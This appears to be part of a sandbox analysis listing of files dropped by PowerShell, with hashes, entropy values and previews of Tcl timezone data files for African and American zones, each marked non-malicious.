                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):4.952872531197478
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcfKiMXGm2OHoVoHvdSF2I:SlSWB9eg/2DEZDm2OHoVoHvdI
                                                                                                                                                                                                                              MD5:CD429B6891CBF603A93F9A9733E2391B
                                                                                                                                                                                                                              SHA1:C6833B83B6D1694AC632018A27915E6F97F708AE
                                                                                                                                                                                                                              SHA-256:FE6B6A4BE1B61F7F909A3F6137530DFE6D1754499A4D9B0D1CE4952FFF0AE62D
                                                                                                                                                                                                                              SHA-512:6E57B70B71515998AD617954F9DDAE19968B20946542201153DAB47FBE63790D42F41AE29148ECBCE6D12812879BCF0A4EC881507B62CDB2675AB20267220BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Maputo) {.. {-9223372036854775808 7820 0 LMT}.. {-2109291020 7200 0 CAT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.964472328419063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DZQs+DWb4n:MByMaHw7NH/t2DZiDWU
                                                                                                                                                                                                                              MD5:88C8FF2B480648EDADBD0FB93F754275
                                                                                                                                                                                                                              SHA1:BED7A784C378909914CEB0D303DFE6D05FD576B7
                                                                                                                                                                                                                              SHA-256:1D80FD86CB733D57D88ECD404E702F750B233ED0CCBFBFFFEED1AAD3B7F1CB04
                                                                                                                                                                                                                              SHA-512:CB7F831CF099E85B948AE57FCE9D91C7EAAD39753AF82C56EC15B65830EB4115A71BBC83A71A2AC947CAB24DEDDB557E02FAA5A3264546AE6E60607DF6BD2FA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Maseru) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):200
                                                                                                                                                                                                                              Entropy (8bit):4.957246428185456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7HbsSHAIgNTzbrN/2DzjEHp4DWb4n:MByMaHw7NH/t2DzjEJ4DWU
                                                                                                                                                                                                                              MD5:CA7255B86425BA706D214924856B6818
                                                                                                                                                                                                                              SHA1:E9BE6CF871BB1786E842953D41392299952EC9AC
                                                                                                                                                                                                                              SHA-256:547197C09C1987350AE5720A4EEC7E8D8F4B9F4A0559726E225E13C707F7C564
                                                                                                                                                                                                                              SHA-512:23F9AD0F926A0945A17BBC3DCFF9A3D7EE68EC9423EA78985F5FFC60CC61641B57871F9AA703B5FB9BE842DCD4693D0641F9EDED702240873F58D24CD4D60C32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Johannesburg)]} {.. LoadTimeZoneFile Africa/Johannesburg..}..set TZData(:Africa/Mbabane) $TZData(:Africa/Johannesburg)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.877126792757121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                              MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                              SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                              SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                              SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                              MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                              SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                              SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                              SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):277
                                                                                                                                                                                                                              Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                              MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                              SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                              SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                              SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                              MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                              SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                              SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                              SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                              MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                              SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                              SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                              SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                              MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                              SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                              SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                              SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                              MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                              SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                              SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                              SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                              MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                              SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                              SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                              SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):234
                                                                                                                                                                                                                              Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                              MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                              SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                              SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                              SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                              MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                              SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                              SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                              SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                              Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                              MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                              SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                              SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                              SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                              MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                              SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                              SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                              SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1649
                                                                                                                                                                                                                              Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                              MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                              SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                              SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                              SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                              MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                              SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                              SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                              SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Adak) {.. {-9223372036854775808 44002 0 LMT}.. {-3225223727 -42398 0 LMT}.. {-2188944802 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8685
                                                                                                                                                                                                                              Entropy (8bit):3.9620252256806845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:esKLO6KLC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:etLhN9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:BFEACEA04AAA8A69A9AC71CF86BCC15C
                                                                                                                                                                                                                              SHA1:1693971B8AAA35021BA34799FB1B9FADC3DA0294
                                                                                                                                                                                                                              SHA-256:DE7FBE2B3ED780C6B82099E1E249DD41F4452A3ADB9DD807B1D0EC06049C2302
                                                                                                                                                                                                                              SHA-512:E94112A2A5F268C03C58CE3BB4C243B2B9B0FC17CB27FDD58BCD2CCC8D377B805C87A552AE7DE1C5698C5F2C4B0FCAB00A3420B1DAD944C1A2F7A47CE7118F78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Anchorage) {.. {-9223372036854775808 50424 0 LMT}.. {-3225223727 -35976 0 LMT}.. {-2188951224 -36000 0 AST}.. {-883576800 -36000 0 AST}.. {-880200000 -32400 1 AWT}.. {-769395600 -32400 1 APT}.. {-765378000 -36000 0 AST}.. {-86882400 -36000 0 AHST}.. {-31500000 -36000 0 AHST}.. {-21470400 -32400 1 AHDT}.. {-5749200 -36000 0 AHST}.. {9979200 -32400 1 AHDT}.. {25700400 -36000 0 AHST}.. {41428800 -32400 1 AHDT}.. {57754800 -36000 0 AHST}.. {73483200 -32400 1 AHDT}.. {89204400 -36000 0 AHST}.. {104932800 -32400 1 AHDT}.. {120654000 -36000 0 AHST}.. {126705600 -32400 1 AHDT}.. {152103600 -36000 0 AHST}.. {162388800 -32400 1 AHDT}.. {183553200 -36000 0 AHST}.. {199281600 -32400 1 AHDT}.. {215607600 -36000 0 AHST}.. {230731200 -32400 1 AHDT}.. {247057200 -36000 0 AHST}.. {262785600 -32400 1 AHDT}.. {278506800 -36000 0 AHST}.. {294235200 -3
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.908728298285591
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/8J5290ppv:MByMYbpwt290/8m90b
                                                                                                                                                                                                                              MD5:1C3CE9F156ABECEAA794E8F1F3A7ADDB
                                                                                                                                                                                                                              SHA1:6F84D0A424FD2DE85E3420EA320A186B277B0295
                                                                                                                                                                                                                              SHA-256:F38610019C0A2C18AC71F5AA108B9647D9B5C01DCB55211AFB8312308C41FE70
